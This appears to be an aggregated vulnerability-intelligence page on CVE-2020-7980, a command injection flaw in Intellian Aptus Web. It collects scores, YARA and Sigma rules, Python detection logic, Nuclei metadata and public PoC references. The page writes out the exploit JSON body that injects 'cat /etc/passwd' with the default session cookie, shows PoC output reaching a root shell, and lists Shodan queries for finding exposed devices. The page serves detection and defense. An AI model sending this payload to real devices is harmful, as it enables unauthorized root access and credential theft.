CVE-2020-7980
Published: 2020-01-25
Priority: P1 90 · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: ITW · Exploit · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 82.96% (99.6th percentile)
Intellian Aptus Web 1.24 allows remote attackers to execute arbitrary OS commands via the Q field within JSON data to the cgi-bin/libagent.cgi URI. NOTE: a valid sid cookie for a login to the intellian default account might be needed.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| intelliantech | aptus_web | — | — |
Detection & IOCs (extracted from sources)

Command (request body used by the public PoC):

```json
{"O_": "A", "F_": "EXEC_CMD", "S_": 123456789, "P1_": {"Q": "cat /etc/passwd", "F": "EXEC_CMD"}, "V_": 1}
```

YARA:

```yara
rule CVE_2020_7980_Intellian_RCE {
    strings:
        $uri = "/cgi-bin/libagent.cgi"
        $field = "EXEC_CMD"
        $cookie = "sid=123456789"
    condition:
        $uri and $field and $cookie
}
```

Sigma:

```yaml
title: CVE-2020-7980 Intellian Aptus Web RCE
detection:
  selection:
    cs-method: POST
    cs-uri-stem|contains: '/cgi-bin/libagent.cgi'
    cs-uri-query|contains: 'type=J'
    cs-cookie|contains: 'sid=123456789'
  condition: selection
```

Detection notes:

- The exploit targets POST requests to /cgi-bin/libagent.cgi?type=J with a JSON body containing the key 'F_': 'EXEC_CMD' and a command in the 'Q' sub-field of 'P1_'. Monitor HTTP POST traffic to this URI for the EXEC_CMD function identifier.
- The exploit uses a hardcoded session cookie value 'sid=123456789' (the default Intellian account credential). Presence of this specific sid value in requests to /cgi-bin/libagent.cgi is a strong indicator of exploitation or reconnaissance.
- The PoC appends a Unix epoch timestamp (in milliseconds) as a query parameter after 'type=J' to the CGI URI. Look for POST requests matching the pattern /cgi-bin/libagent.cgi?type=J&<13-digit-epoch>.
- Shodan/FOFA exposure queries can identify internet-facing vulnerable devices. Hosts with HTTP title 'Intellian Aptus Web' are candidate targets.
- Successful exploitation results in command execution as root (uid=0). Correlate web server logs for POST to /cgi-bin/libagent.cgi with subsequent anomalous process spawning from the CGI process.
- The regex 'root:[x*]:0:0' in the HTTP response body can be used as a detection matcher to confirm successful /etc/passwd exfiltration via this vulnerability.

Caveats:

- The hardcoded sid value '123456789' corresponds to the default Intellian account. Attackers may also use a legitimately obtained session token, so absence of this exact value does not rule out exploitation.
- The exploit was tested against version 1.12 and confirmed on 1.24; the PoC author notes 'v1.12+' as the affected range, so detection rules should not be version-gated.
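As an added example (not code from the page, the PoC, or the vendor), the indicators and caveats above turned into detection logic over access-log fields: `score_request` and `classify` are hypothetical names, the field order follows the Sigma rule's cs-* fields, and the sample traffic is constructed, reusing only the request shape already quoted above.

```python
import json
import re

TARGET_URI = "/cgi-bin/libagent.cgi"
DEFAULT_SID = "sid=123456789"                    # default Intellian account session cookie
QUERY_RE = re.compile(r"^type=J(?:&\d{13})?$")   # type=J, optionally &<13-digit epoch ms>
PASSWD_RE = re.compile(r"root:[x*]:0:0")         # response matcher quoted above

def score_request(method, uri_stem, uri_query, cookie, body, response_body=""):
    """Collect the CVE-2020-7980 indicators one logged exchange matches; {} means none.
    Argument order follows the Sigma rule's cs-* fields (hypothetical helper)."""
    hits = {}
    if method.upper() != "POST" or uri_stem != TARGET_URI:
        return hits
    if QUERY_RE.match(uri_query):
        hits["type_J_query"] = True
    if DEFAULT_SID in cookie:
        hits["default_sid"] = True
    try:
        doc = json.loads(body)
    except ValueError:
        doc = None
    if isinstance(doc, dict):
        if doc.get("F_") == "EXEC_CMD":
            hits["exec_cmd"] = True
        p1 = doc.get("P1_")
        if isinstance(p1, dict) and isinstance(p1.get("Q"), str):
            hits["command"] = p1["Q"]        # injected command string, for the analyst
    if PASSWD_RE.search(response_body):
        hits["passwd_in_response"] = True
    return hits

def classify(hits):
    """Rank a hit set; EXEC_CMD is flagged even without the default sid (stolen sids work too)."""
    if "exec_cmd" in hits:
        return "confirmed" if "passwd_in_response" in hits else "likely"
    if "default_sid" in hits:
        return "recon"
    return "benign"      # ordinary agent traffic, or not this endpoint at all

SAMPLE = [  # constructed traffic for demonstration, not captured data
    ("POST", TARGET_URI, "type=J&1579900000000", "sid=123456789",
     '{"O_": "A", "F_": "EXEC_CMD", "S_": 123456789, '
     '"P1_": {"Q": "cat /etc/passwd", "F": "EXEC_CMD"}, "V_": 1}',
     "root:x:0:0:root:/root:/bin/sh\n"),
    ("POST", TARGET_URI, "type=J", "sid=f00dbabe", '{"F_": "EXEC_CMD", "P1_": {"Q": "id"}}'),
    ("POST", TARGET_URI, "type=J", "sid=123456789", '{"F_": "GET_STATUS"}'),
    ("GET", "/index.html", "", "", ""),
]
```

The second sample shows why the rule should not key on the cookie alone: a non-default sid with an EXEC_CMD body is still ranked "likely".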
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | 2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| vulncheck | — | 9.8 | CRITICAL | — |
GHSA
GHSA-wfw7-q64q-6rfc: Intellian Aptus Web 1 (ghsa_unreviewed · 2022-05-24)
CVE-2020-7980 [HIGH] · CWE-78
Intellian Aptus Web 1.24 allows remote attackers to execute arbitrary OS commands via the Q field within JSON data to the cgi-bin/libagent.cgi URI. NOTE: a valid sid cookie for a login to the intellian default account might be needed.
VulnCheck
CVE-2020-7980 [CRITICAL] · vulncheck · 2020 · CVSS 9.8
intelliantech aptus_web: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Intellian Aptus Web 1.24 allows remote attackers to execute arbitrary OS commands via the Q field within JSON data to the cgi-bin/libagent.cgi URI. NOTE: a valid sid cookie for a login to the intellian default account might be needed.
Affected: intelliantech aptus_web
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-15&host_type=src&vulnerability=cve-2020-7980; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-20&host_type=
No detection rules found.
Exploit-DB
Satellian 1.12 - Remote Code Execution (CVE-2020-7980 [CRITICAL] · exploitdb · 2020-01-29 · CVSS 9.8)
---
```text
# Exploit Title: Satellian 1.12 - Remote Code Execution
# Date: 2020-01-28
# Exploit Author: Xh4H
# Vendor Homepage: https://www.intelliantech.com/?lang=en
# Version: v1.12+
# Tested on: Kali linux, MacOS
# CVE : CVE-2020-7980
# Github repository: https://github.com/Xh4H/Satellian-CVE-2020-7980
# xh4h@Macbook-xh4h ~/Satellian> python satellian.py -u http://
# ________________________________________
# (__) / \
# (oo) ( Intellian Satellite Terminal PoC )
# /-------\/ --' \________________________________________/
# / | ||
# * ||----||
# Performing initial scan. Listing available system binaries.
# Starting request to http://
# Executing command /bin/ls /bin
# acu_server
# acu_tool
# addgroup
# adduser
# ...
# Satellian $ id
# uid=0(root) gid=
```
Nuclei
Satellian Intellian Aptus Web <= 1.24 - Remote Command Execution (CVE-2020-7980 [CRITICAL] · nuclei · CVSS 9.8)
```yaml
reference:
  - https://nvd.nist.gov/vuln/detail/CVE-2020-7980
  - https://sku11army.blogspot.com/2020/01/intellian-aptus-web-rce-intellian.html
  - https://github.com/Xh4H/Satellian-CVE-2020-7980
  - http://packetstormsecurity.com/files/156143/Satellian-1.12-Remote-Code-Execution.html
  - https://github.com/0xT11/CVE-POC
classification:
  cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  cvss-score: 9.8
  cve-id: CVE-2020-7980
  cwe-id: CWE-78
  epss-score: 0.93844
  epss-percentile: 0.99865
  cpe: cpe:2.3:a:intelliantech:aptus_web:1.24:*:*:*:*:*:*:*
metadata:
  max-request: 1
  vendor: intelliantech
  product: aptus_web
  shodan-query:
    - http.title:"Intellian Aptus Web"
    - http.title:"intellian aptus web"
  fofa-query: title="intellian aptus web"
  google-query: intitle:"intell
```
Fortinet
Mirai, RAR1Ransom, and GuardMiner – Multiple Malware Campaigns Target VMware Vulnerability (CVE-2022-22954 [CRITICAL] · blogs_fortinet · 2022-10-21 · CVSS 9.8)
FORTIGUARD LABS THREAT RESEARCH
By Cara Lin | October 21, 2022
In April, VMware patched the vulnerability CVE-2022-22954. It causes server-side template injection because of the lack of sanitization on the parameters “deviceUdid” and “devicetype”. It allows attackers to inject a payload and achieve remote code execution on VMware Workspace ONE Access and Identity Manager. FortiGuard Labs published a Threat Signal Report about it and also developed an IPS signature in April.
We have observed attacks in the wild since then. Most of the payloads focus on probing a victim’s sensitive data, for example, passwords, hosts file, etc. But in August, there were a few particular payloads, which got our interest. They had th
Greynoiseio
NoiseLetter June 2025 (blogs_greynoiseio)
References
- http://packetstormsecurity.com/files/156143/Satellian-1.12-Remote-Code-Execution.html
- https://github.com/Xh4H/Satellian-CVE-2020-7980
- https://sku11army.blogspot.com/2020/01/intellian-aptus-web-rce-intellian.html